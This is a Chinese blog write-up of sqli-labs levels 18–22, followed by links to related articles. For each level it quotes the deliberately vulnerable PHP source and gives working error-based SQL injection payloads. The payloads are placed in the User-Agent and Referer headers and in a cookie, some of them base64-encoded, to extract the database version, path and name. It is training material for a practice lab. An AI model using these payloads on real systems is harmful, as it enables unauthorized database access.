Sqli-labs Less18-22 HTTP 头注入 POST

最新推荐文章于 2024-03-18 09:04:17 发布
最新推荐文章于 2024-03-18 09:04:17 发布
阅读量935 收藏 2
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81519280
版权

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

Less - 18: POSt - Header injection- Uagent field - Error vased

  1. 测试漏洞

    源代码

    $uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

# uname 和passwd 进行了check_input()函数的处理

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
mysql_query($insert);

# Ip 地址我们这里修改不是很方便,但是useragent 修改较为方便,我们从 user-agent 入手我们利用 burpsuite 进行抓包改包

    在浏览器输入正确的用户名和密码 admin:admin

    使用 burpsuite 进行截断,之后修改 HTTP 头的 User-Agent

    结果在浏览器显示出了 User-Agent

  2. User-Agent 注入

    User-Agent: 'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1

    低版本的 mysql 不支持这个 extractvalue() 函数

Less - 19: POSt - Header Injection - Referer field - Error basesd

  1. 测试漏洞

    源代码

    $uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

# uname 和passwd 进行了check_input()函数的处理

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);

# Ip 地址我们这里修改不是很方便,但是 referer 修改较为方便,我们从 referer 入手我们利用 burpsuite 进行抓包改包

    在浏览器输入正确的用户名和密码 admin:admin

    使用 burpsuite 进行截断,之后修改 HTTP 头的 referer

    结果在浏览器显示出了 referer

  2. Referer 注入

    Referer: 'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1

    低版本的 mysql 不支持这个 extractvalue() 函数

Less - 20: POST - Cookie Injection - Uagent field - Error based

  1. 测试漏洞

    源代码

    $uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

# uname 和passwd 进行了check_input()函数的处理

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
$cookee = $row1['username'];
    if($row1)
        {
        setcookie('uname', $cookee, time()+3600);
        header ('Location: index.php');
        }


# 从源代码中我们可以看到 cookie 从 username 中获得值后,当再次刷新时,会从 cookie 中读取 username,然后进行查询。
# 登录成功后,我们修改 cookie,再次刷新时,这时候sql 语句就会被修改了。我们使用 temper data 进行演示。

    在浏览器输入正确的用户名和密码 admin:admin

    修改 cookie 值为

    uname=1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#

    结果显示为版本号。

    使用 burpsuite-reperter 抓包添加一行 cookie 值

  1. 测试漏洞

    本关对 cookie 进行了 base64 的处理,其他的处理流程和 less20 是一样的。

    源代码

    $uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

# uname 和passwd 进行了check_input()函数的处理

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
        if($row1)
            {
            setcookie('uname', base64_encode($row1['username']), time()+3600);
            header ('Location: index.php');
            }

    我们这里可以利用 less20 同样的方法,但是需要将 payload 进行 base64 编码处理(注意这里对uname 进行了(‘uname’)的处理)

    Cookie:

    uname=YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=

    在浏览器输入正确的用户名和密码 admin:admin

    修改 cookie 值为

    uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#

    结果显示为版本号。

  1. 测试漏洞

    本关对cookie 进行了 base64 的处理,其他的处理流程和 less20 是一样的。

    源代码

    $uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

# uname 和passwd 进行了check_input()函数的处理

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
    $result1 = mysql_query($sql);
    $row1 = mysql_fetch_array($result1);
        if($row1)
            {
            setcookie('uname', base64_encode($row1['username']), time()+3600);
            header ('Location: index.php');
            }

    本关和 less20、less21 是一致的,我们可以从源代码中看到这里对 uname 进行了 ”uname” 的处理,可以构造payload:

    admin1"and extractvalue(1,concat(0x7e,(select database()),0x7e))#

# base64 编码之后:

cookie: YWRtaW4xImFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM=

    Payload 进行 base64 编码后,修改 cookie 再进行提交

    可以看到数据库名为 security

    其他的payload 请自行发散思维进行构造。

网络安全打工人
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
Sqli-labs 复习 Less18-22 HTTP 注入 POST
kevinhanser
08-11 553
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 HTTP 注入 HTTP 部详解 Accept 告诉WEB 服务器自己接受什么介质类型,/ 表示任何类型,type/* 表示该类型下的所有子类型,type/sub-type。 Accept-Charset 浏览器申明自己接收的字符集 Accept-Encod...
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1096
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs通关全解---有关请求注入--less18-22--7
cyynid的博客
01-12 404
Accept: application/json 浏览器可以接受服务器回发的类型为 application/json。Accept: */* 代表浏览器可以处理所有类型,(一般浏览器发给服务器都是发这个)。Accept-Encoding: gzip, deflate 浏览器申明自己接收的编码方法,通常指定压缩方法,是否支持压缩,支持什么压缩方法(gzip,deflate),(注意:这不是只字符编码)。q=0.9 浏览器申明自己接收的语言。
sqli-labs less11 POST注入-字符型
qq_51550750的博客
03-23 947
sqli-labs less11 POST注入 注入工具:burp (1)判断类型: burp抓包,看到传参admin,是可以正常显示的: and 1 = 1 异常,估计不是数字型 尝试单引号: 报错了,好征兆 and 1=1 --+ and 1 = 2 --+ 由此,断定这个字符型 的闭合就是’ (2)判断字段个数: order by 1回显正常 order by 2回显正常 order by 3回显错误 判断字段个数是2个 (3)判断回显位置: 显然,两个回显位置都可以 (4)爆数
sqli注入详解——>sqli-labs less-1~65
最新发布
qq_51780583的博客
03-18 785
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1254
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs Less11 POST注入
m0_63711447的博客
04-14 550
POST注入,不能直接在地址栏构造payload,通过bp或者hackbar构造payload 1、先抓包查看传参方式和传参数据 2、闭合测试 在admin后加一个单引号重新发包,出现报错,可知是单引号闭合方式 用万能密码'or 1=1#试试 3、使用order by语句判断有几列 order by3报错,order by2回显正常,所有有两个回显位 4、查库,得到当前数据库为security uname=1admin' union select 1,databa..
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 651
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
BurpSuite 的导入和导出
kevinhanser
07-12 9442
使用的版本为 burpsuite_pro_v2020.6.jar BurpSuite 的导入和导出 2020年7月12日10:54:51【原创】 1. 简介 主要目的是使用burp记录浏览记录,并保存成文件 2. 导出 导出整个项目成 .burp 文件 位置:Project -> Save copy 优点:跨平台分享项目中所有浏览记录 测试:二进制文件 先尽情的抓包,然后保存即可,可以只选择保存 Proxy的内容,也可以全都保存。 2. 导出单个浏览记录 位置: Proxy -> 选.
文件上传 05 服务端检测绕过(文件内容检测)
kevinhanser
08-13 6283
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
文件上传 04 服务端检测绕过(文件扩展名检测)
kevinhanser
08-13 3581
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
文件上传 02 服务端检测绕过(MIME类型检测)
kevinhanser
08-12 3120
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值